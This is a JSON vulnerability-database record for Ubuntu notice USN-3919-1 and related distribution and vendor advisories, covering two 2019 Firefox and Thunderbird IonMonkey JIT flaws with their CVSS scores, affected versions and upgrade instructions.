{"id": "USN-3919-1", "bulletinFamily": "unix", "title": "Firefox vulnerabilities", "description": "Two security issues were discovered in the JavaScript engine in Firefox. \nIf a user were tricked in to opening a specially crafted website, an \nattacker could exploit this by causing a denial of service, or executing \narbitrary code.", "published": "2019-03-25T00:00:00", "modified": "2019-03-25T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://ubuntu.com/security/notices/USN-3919-1", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2019-9813", "https://people.canonical.com/~ubuntu-security/cve/CVE-2019-9810"], "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "type": "ubuntu", "lastseen": "2020-07-02T11:34:21", "edition": 4, "viewCount": 42, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-9810", "CVE-2019-9813"]}, {"type": "archlinux", "idList": ["ASA-201903-14", "ASA-201904-4"]}, {"type": "oraclelinux", "idList": ["ELSA-2019-0681", "ELSA-2019-0680", "ELSA-2019-0672", "ELSA-2019-0966", "ELSA-2019-0671", "ELSA-2019-1144"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1727-1:16406", "DEBIAN:DSA-4417-1:DB9AB"]}, {"type": "kaspersky", "idList": ["KLA11453", "KLA11450", "KLA11451"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:1152-1", "OPENSUSE-SU-2019:1056-1", "OPENSUSE-SU-2019:1077-1", "OPENSUSE-SU-2019:1126-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310814947", "OPENVAS:1361412562310814943", "OPENVAS:1361412562310814942", "OPENVAS:1361412562310814941", "OPENVAS:1361412562310883030", "OPENVAS:1361412562310883029", "OPENVAS:1361412562310814946", "OPENVAS:1361412562310704417", "OPENVAS:1361412562311220191570", "OPENVAS:1361412562310891727"]}, {"type": "slackware", "idList": ["SSA-2019-081-01"]}, {"type": "redhat", "idList": ["RHSA-2019:0966", "RHSA-2019:0680", "RHSA-2019:0671", "RHSA-2019:0681", "RHSA-2019:0672"]}, {"type": "centos", "idList": ["CESA-2019:0671", "CESA-2019:0681", "CESA-2019:0680", "CESA-2019:0672"]}, {"type": "nessus", "idList": ["MACOS_THUNDERBIRD_60_6_1.NASL", "MOZILLA_THUNDERBIRD_60_6_1.NASL", "ORACLELINUX_ELSA-2019-0672.NASL", "MACOS_FIREFOX_66_0_1.NASL", "EULEROS_SA-2019-1570.NASL", "REDHAT-RHSA-2019-0672.NASL", "SL_20190327_FIREFOX_ON_SL7_X.NASL", "CENTOS_RHSA-2019-0672.NASL", "ORACLELINUX_ELSA-2019-0671.NASL", "NEWSTART_CGSL_NS-SA-2019-0095_FIREFOX.NASL"]}, {"type": "zdi", "idList": ["ZDI-19-364", "ZDI-19-365"]}, {"type": "exploitdb", "idList": ["EDB-ID:46646", "EDB-ID:47752", "EDB-ID:46605"]}, {"type": "zdt", "idList": ["1337DAY-ID-33639", "1337DAY-ID-32423", "1337DAY-ID-32482"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152251", "PACKETSTORM:152304"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:6998E6040B132C28C7A52F5F3C5E15E8", "EXPLOITPACK:63A0D5452D21EF0FAB97365E7C125A53"]}, {"type": "cisa", "idList": ["CISA:3568C9A99B63B8D5AC12A7DD1913C3BA"]}, {"type": "ubuntu", "idList": ["USN-3927-1"]}, {"type": "amazon", "idList": ["ALAS2-2019-1195"]}], "modified": "2020-07-02T11:34:21", "rev": 2}, "score": {"value": 5.9, "vector": "NONE", "modified": "2020-07-02T11:34:21", "rev": 2}, "vulnersScore": 5.9}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "18.10", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "firefox", "packageVersion": "66.0.1+build1-0ubuntu0.18.10.1"}, {"OS": "Ubuntu", "OSVersion": "18.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "firefox", "packageVersion": "66.0.1+build1-0ubuntu0.18.04.1"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "firefox", "packageVersion": "66.0.1+build1-0ubuntu0.16.04.1"}, {"OS": "Ubuntu", "OSVersion": "14.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "firefox", "packageVersion": "66.0.1+build1-0ubuntu0.14.04.1"}], "scheme": null}

{"cve": [{"lastseen": "2020-12-09T21:41:58", "description": "Incorrect alias information in IonMonkey JIT compiler for Array.prototype.slice method may lead to missing bounds check and a buffer overflow. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1.", "edition": 14, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-26T17:29:00", "title": "CVE-2019-9810", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9810"], "modified": "2019-05-13T10:29:00", "cpe": [], "id": "CVE-2019-9810", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9810", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2020-12-09T21:41:58", "description": "Incorrect handling of __proto__ mutations may lead to type confusion in IonMonkey JIT code and can be leveraged for arbitrary memory read and write. This vulnerability affects Firefox < 66.0.1, Firefox ESR < 60.6.1, and Thunderbird < 60.6.1.", "edition": 14, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-26T17:29:00", "title": "CVE-2019-9813", "type": "cve", "cwe": ["CWE-843"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-9813"], "modified": "2020-08-24T17:37:00", "cpe": [], "id": "CVE-2019-9813", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9813", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "archlinux": [{"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "Arch Linux Security Advisory ASA-201904-4\n=========================================\n\nSeverity: Critical\nDate : 2019-04-06\nCVE-ID : CVE-2019-9810 CVE-2019-9813\nPackage : thunderbird\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-947\n\nSummary\n=======\n\nThe package thunderbird before version 60.6.1-1 is vulnerable to\narbitrary code execution.\n\nResolution\n==========\n\nUpgrade to 60.6.1-1.\n\n# pacman -Syu \"thunderbird>=60.6.1-1\"\n\nThe problems have been fixed upstream in version 60.6.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-9810 (arbitrary code execution)\n\nAn incorrect alias information in the IonMonkey JIT compiler of Firefox\nbefore 66.0.1 and Thunderbird before 60.6.1 for the\nArray.prototype.slice method may lead to missing bounds check and a\nbuffer overflow.\n\n- CVE-2019-9813 (arbitrary code execution)\n\nAn incorrect handling of __proto__ mutations may lead to type confusion\nin the IonMonkey JIT code of Firefox before 66.0.1 and Thunderbird\nbefore 60.6.1, and can be leveraged for arbitrary memory read and\nwrite.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-12/\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9810\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-12/#CVE-2019-9810\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1537924\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-12/#CVE-2019-9813\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1538006\nhttps://security.archlinux.org/CVE-2019-9810\nhttps://security.archlinux.org/CVE-2019-9813", "modified": "2019-04-06T00:00:00", "published": "2019-04-06T00:00:00", "id": "ASA-201904-4", "href": "https://security.archlinux.org/ASA-201904-4", "type": "archlinux", "title": "[ASA-201904-4] thunderbird: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-22T18:36:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9810", "CVE-2019-9813"], "description": "Arch Linux Security Advisory ASA-201903-14\n==========================================\n\nSeverity: Critical\nDate : 2019-03-23\nCVE-ID : CVE-2019-9810 CVE-2019-9813\nPackage : firefox\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-930\n\nSummary\n=======\n\nThe package firefox before version 66.0.1-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 66.0.1-1.\n\n# pacman -Syu \"firefox>=66.0.1-1\"\n\nThe problems have been fixed upstream in version 66.0.1.\n\nWorkaround\n==========\n\nNone.\n\nDescription\n===========\n\n- CVE-2019-9810 (arbitrary code execution)\n\nAn incorrect alias information in the IonMonkey JIT compiler of Firefox\nbefore 66.0.1 for the Array.prototype.slice method may lead to missing\nbounds check and a buffer overflow.\n\n- CVE-2019-9813 (arbitrary code execution)\n\nAn incorrect handling of __proto__ mutations may lead to type confusion\nin the IonMonkey JIT code of Firefox before 66.0.1 and can be leveraged\nfor arbitrary memory read and write.\n\nImpact\n======\n\nA remote attacker can execute arbitrary code on the affected host.\n\nReferences\n==========\n\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9810\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1537924\nhttps://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813\nhttps://bugzilla.mozilla.org/show_bug.cgi?id=1538006\nhttps://security.archlinux.org/CVE-2019-9810\nhttps://security.archlinux.org/CVE-2019-9813", "modified": "2019-03-23T00:00:00", "published": "2019-03-23T00:00:00", "id": "ASA-201903-14", "href": "https://security.archlinux.org/ASA-201903-14", "type": "archlinux", "title": "[ASA-201903-14] firefox: arbitrary code execution", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "[60.6.1-1.0.1]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n[60.6.1-1]\n- Update to 60.6.1 ESR (Build 1)", "edition": 4, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "ELSA-2019-0671", "href": "http://linux.oracle.com/errata/ELSA-2019-0671.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:14", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "[60.6.1-1.0.1]\n- fix LD_LIBRARY_PATH\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat one\n[60.6.1-1]\n- Update to 60.6.1 ESR (Build 1)", "edition": 3, "modified": "2019-03-27T00:00:00", "published": "2019-03-27T00:00:00", "id": "ELSA-2019-0672", "href": "http://linux.oracle.com/errata/ELSA-2019-0672.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:05", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "[60.6.1-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[60.6.1-1]\n- Update to 60.6.1\n[60.6.0-1]\n- Update to 60.6.0", "edition": 3, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "ELSA-2019-0680", "href": "http://linux.oracle.com/errata/ELSA-2019-0680.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-19T21:14:56", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "[60.6.1-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[60.6.1-1]\n- Update to 60.6.1\n[60.6.0-1]\n- Update to 60.6.0", "edition": 1, "modified": "2019-07-30T00:00:00", "published": "2019-07-30T00:00:00", "id": "ELSA-2019-1144", "href": "http://linux.oracle.com/errata/ELSA-2019-1144.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-19T21:10:56", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "[60.6.1-1.0.2]\n- Rebuild to pickup Oracle default bookmarks [Orabug: 30069264]\n[60.6.1-1.0.1]\n- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file\n- Build with ol8 rust/llvm rather than scl\n[60.6.1-1]\n- Update to 60.6.1 ESR (Build 1)\n[60.6.0-3]\n- Added Google API keys (mozbz#1531176)\n[60.6.0-2]\n- Update to 60.6.0 ESR (Build 2)\n[60.6.0-1]\n- Update to 60.6.0 ESR (Build 1)", "edition": 1, "modified": "2019-07-30T00:00:00", "published": "2019-07-30T00:00:00", "id": "ELSA-2019-0966", "href": "http://linux.oracle.com/errata/ELSA-2019-0966.html", "title": "firefox security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:59", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2018-18506"], "description": "[60.6.1-1.0.1]\n- Replaced thunderbird-redhat-default-prefs.js with thunderbird-oracle-default-prefs.js\n[60.6.1-1]\n- Update to 60.6.1\n[60.6.0-1]\n- Update to 60.6.0", "edition": 4, "modified": "2019-03-28T00:00:00", "published": "2019-03-28T00:00:00", "id": "ELSA-2019-0681", "href": "http://linux.oracle.com/errata/ELSA-2019-0681.html", "title": "thunderbird security update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kaspersky": [{"lastseen": "2020-09-02T11:55:59", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "### *Detect date*:\n03/22/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Mozilla Firefox ESR. Malicious users can exploit these vulnerabilities to execute arbitrary code and bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMozilla Firefox ESR earlier than 60.6.1\n\n### *Solution*:\nUpdate to the latest version \n[Download Mozilla Firefox ESR](<https://www.mozilla.org/en-US/firefox/organizations/all/>)\n\n### *Original advisories*:\n[MFSA2019-10](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox ESR](<https://threats.kaspersky.com/en/product/Mozilla-Firefox-ESR/>)\n\n### *CVE-IDS*:\n[CVE-2019-9810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9810>)7.5Critical \n[CVE-2019-9813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9813>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-03-22T00:00:00", "id": "KLA11451", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11451", "title": "\r KLA11451Multiple vulnerabilities in Mozilla Firefox ESR ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T11:42:01", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "### *Detect date*:\n03/25/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Mozilla Thunderbird. Malicious users can exploit these vulnerabilities to execute arbitrary code and bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMozilla Thunderbird earlier than 60.6.1\n\n### *Solution*:\nUpdate to the latest version \n[Download Mozilla Thunderbird](<https://www.mozilla.org/en-US/thunderbird/>)\n\n### *Original advisories*:\n[mfsa2019-12](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Thunderbird](<https://threats.kaspersky.com/en/product/Mozilla-Thunderbird/>)\n\n### *CVE-IDS*:\n[CVE-2019-9810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9810>)7.5Critical \n[CVE-2019-9813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9813>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-03-25T00:00:00", "id": "KLA11453", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11453", "title": "\r KLA11453Multiple vulnerabilities in Mozilla Thunderbird ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-02T11:46:29", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "### *Detect date*:\n03/22/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Mozilla Firefox. Malicious users can exploit these vulnerabilities to execute arbitrary code and bypass security restrictions.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nMozilla Firefox earlier than 66.0.1\n\n### *Solution*:\nUpdate to the latest version \n[Download Mozilla Firefox](<https://www.mozilla.org/en-US/firefox/new/>)\n\n### *Original advisories*:\n[MFSA2019-09](<https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Mozilla Firefox](<https://threats.kaspersky.com/en/product/Mozilla-Firefox/>)\n\n### *CVE-IDS*:\n[CVE-2019-9810](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9810>)7.5Critical \n[CVE-2019-9813](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9813>)0.0Unknown", "edition": 1, "modified": "2020-06-18T00:00:00", "published": "2019-03-22T00:00:00", "id": "KLA11450", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11450", "title": "\r KLA11450Multiple vulnerabilities in Mozilla Firefox ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2019-04-04T23:13:11", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "This update for MozillaThunderbird fixes the following issues:\n\n Security issues fixed:\n\n - update to Mozilla Thunderbird 60.6.1 (bsc#1130262):\n\n - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations\n - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information\n\n Release notes:\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-12\">https://www.mozilla.org/en-US/security/advisories/mfsa2019-12</a>\n\n", "edition": 1, "modified": "2019-04-04T21:10:38", "published": "2019-04-04T21:10:38", "id": "OPENSUSE-SU-2019:1152-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00026.html", "title": "Security update for MozillaThunderbird (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-29T14:53:30", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2019-9794", "CVE-2018-18506"], "description": "This update for MozillaFirefox fixes the following issues:\n\n Mozilla Firefox was updated to 60.6.1esr / MFSA 2019-10 (bsc#1130262)\n\n * CVE-2019-9810: IonMonkey MArraySlice has incorrect alias information\n * CVE-2019-9813: Ionmonkey type confusion with __proto__ mutations\n\n Mozilla Firefox was updated to 60.6.0esr / MFSA 2019-08 (boo#1129821)\n\n * CVE-2019-9790: Use-after-free when removing in-use DOM elements\n * CVE-2019-9791: Type inference is incorrect for constructors entered\n through on-stack replacement with IonMonkey\n * CVE-2019-9792: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script\n * CVE-2019-9793: Improper bounds checks when Spectre mitigations are\n disabled\n * CVE-2019-9794: Command line arguments not discarded during execution\n * CVE-2019-9795: Type-confusion in IonMonkey JIT compiler\n * CVE-2019-9796: Use-after-free with SMIL animation controller\n * CVE-2018-18506: Proxy Auto-Configuration file can define localhost\n access to be proxied\n * CVE-2019-9788: Memory safety bugs fixed in Firefox 66 and Firefox ESR\n 60.6\n\n Mozilla Firefox 60.5.2esr also had one change:\n\n * Fix a frequent crash when reading various Reuters news articles.\n\n", "edition": 1, "modified": "2019-03-29T12:20:13", "published": "2019-03-29T12:20:13", "id": "OPENSUSE-SU-2019:1077-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00043.html", "title": "Security update for MozillaFirefox (important)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-03-27T14:46:40", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-9796", "CVE-2019-9790", "CVE-2019-9794", "CVE-2018-18506"], "description": "This update for MozillaFirefox fixes the following issues:\n\n Mozilla Firefox was updated to 60.6.1esr (MFSA 2019-10 boo#1130262)\n\n * CVE-2019-9810: IonMonkey MArraySlice has incorrect alias information\n * CVE-2019-9813: Ionmonkey type confusion with __proto__ mutations\n\n Mozilla Firefox was updated to 60.6.0esr (MFSA 2019-08 boo#1129821)\n\n * CVE-2019-9790: Use-after-free when removing in-use DOM elements\n * CVE-2019-9791: Type inference is incorrect for constructors entered\n through on-stack replacement with IonMonkey\n * CVE-2019-9792: IonMonkey leaks JS_OPTIMIZED_OUT magic value to script\n * CVE-2019-9793: Improper bounds checks when Spectre mitigations are\n disabled\n * CVE-2019-9794: Command line arguments not discarded during execution\n * CVE-2019-9795: Type-confusion in IonMonkey JIT compiler\n * CVE-2019-9796: Use-after-free with SMIL animation controller\n * CVE-2018-18506: Proxy Auto-Configuration file can define localhost\n access to be proxied\n * CVE-2019-9788: Memory safety bugs fixed in Firefox 66 and Firefox ESR\n 60.6\n\n Mozilla Firefox was updated to 60.5.2esr:\n\n * Fix a frequent crash when reading various Reuters news articles\n\n", "edition": 1, "modified": "2019-03-27T12:10:28", "published": "2019-03-27T12:10:28", "id": "OPENSUSE-SU-2019:1056-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00035.html", "title": "Security update for MozillaFirefox (important)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-04-03T15:10:04", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9788", "CVE-2019-9801", "CVE-2019-9791", "CVE-2019-9813", "CVE-2019-9810", "CVE-2019-9792", "CVE-2019-9793", "CVE-2019-9795", "CVE-2019-5785", "CVE-2019-9796", "CVE-2019-9790", "CVE-2019-9794", "CVE-2018-18506"], "description": "This update for MozillaThunderbird fixes the following issues:\n\n Security issues fixed:\n\n - Update to MozillaThunderbird 60.6.1 (bsc#1130262):\n\n - CVE-2019-9813: Fixed Ionmonkey type confusion with __proto__ mutations\n - CVE-2019-9810: Fixed IonMonkey MArraySlice incorrect alias information\n\n - Update to MozillaThunderbird 60.6 (bsc#1129821):\n\n - CVE-2018-18506: Fixed an issue with Proxy Auto-Configuration file\n - CVE-2019-9801: Fixed an issue which could allow Windows programs to be\n exposed to web content\n - CVE-2019-9788: Fixed multiple memory safety bugs\n - CVE-2019-9790: Fixed a Use-after-free vulnerability when removing in-use\n DOM elements\n - CVE-2019-9791: Fixed an incorrect Type inference for constructors\n entered through on-stack replacement with IonMonkey\n - CVE-2019-9792: Fixed an issue where IonMonkey leaks JS_OPTIMIZED_OUT\n magic value to script\n - CVE-2019-9793: Fixed multiple improper bounds checks when Spectre\n mitigations are disabled\n - CVE-2019-9794: Fixed an issue where command line arguments not discarded\n during execution\n - CVE-2019-9795: Fixed a Type-confusion vulnerability in IonMonkey JIT\n compiler\n - CVE-2019-9796: Fixed a Use-after-free vulnerability in SMIL animation\n controller\n\n Release notes:\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/\">https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/</a>\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-11/\">https://www.mozilla.org/en-US/security/advisories/mfsa2019-11/</a>\n\n", "edition": 1, "modified": "2019-04-03T12:12:14", "published": "2019-04-03T12:12:14", "id": "OPENSUSE-SU-2019:1126-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00023.html", "title": "Security update for MozillaThunderbird (critical)", "type": "suse", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "debian": [{"lastseen": "2020-08-12T00:57:39", "bulletinFamily": "unix", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "description": "Package : firefox-esr\nVersion : 60.6.1esr-1~deb8u1\nCVE ID : CVE-2019-9810 CVE-2019-9813\n\nMultiple security issues have been found in the Mozilla Firefox web\nbrowser, which could potentially result in the execution of arbitrary\ncode.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n60.6.1esr-1~deb8u1.\n\nWe recommend that you upgrade your firefox-esr packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 8, "modified": "2019-03-25T13:12:34", "published": "2019-03-25T13:12:34", "id": "DEBIAN:DLA-1727-1:16406", "href": "https://lists.debian.org/debian-lts-announce/2019/debian-lts-announce-201903/msg00029.html", "title": "[SECURITY] [DLA 1727-1] firefox-esr security update", "type": "debian", "cvss": {"score": 6.8, "vector": 